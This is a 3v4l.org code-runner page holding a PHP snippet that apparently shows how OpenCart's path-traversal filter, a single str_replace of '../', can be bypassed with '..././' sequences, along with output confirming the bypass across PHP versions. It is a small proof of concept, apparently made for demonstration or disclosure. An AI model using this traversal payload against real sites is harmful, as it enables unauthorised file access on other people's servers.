3v4l.org

run code in 300+ PHP versions simultaneously
<?php // What OpenCart expects people to try: $route = 'apple/../../../../dog'; $parts = explode('/', str_replace('../', '', (string)$route)); var_dump($parts); // How to bypass their protection: $route = 'apple/..././..././..././..././dog'; $parts = explode('/', str_replace('../', '', (string)$route)); var_dump($parts);
Output for 4.3.0 - 4.3.11, 4.4.0 - 4.4.9, 5.0.0 - 5.0.5, 5.1.0 - 5.1.6, 5.2.0 - 5.2.17, 5.3.0 - 5.3.29, 5.4.0 - 5.4.45, 5.5.0 - 5.5.38, 5.6.0 - 5.6.30, 7.0.0 - 7.0.29, 7.1.0 - 7.1.20, 7.2.0 - 7.2.33, 7.3.16 - 7.3.33, 7.4.0 - 7.4.33, 8.0.0 - 8.0.30, 8.1.0 - 8.1.33, 8.2.0 - 8.2.29, 8.3.0 - 8.3.26, 8.4.1 - 8.4.13
array(2) { [0]=> string(5) "apple" [1]=> string(3) "dog" } array(6) { [0]=> string(5) "apple" [1]=> string(2) ".." [2]=> string(2) ".." [3]=> string(2) ".." [4]=> string(2) ".." [5]=> string(3) "dog" }
preferences:
149.78 ms | 411 KiB | 5 Q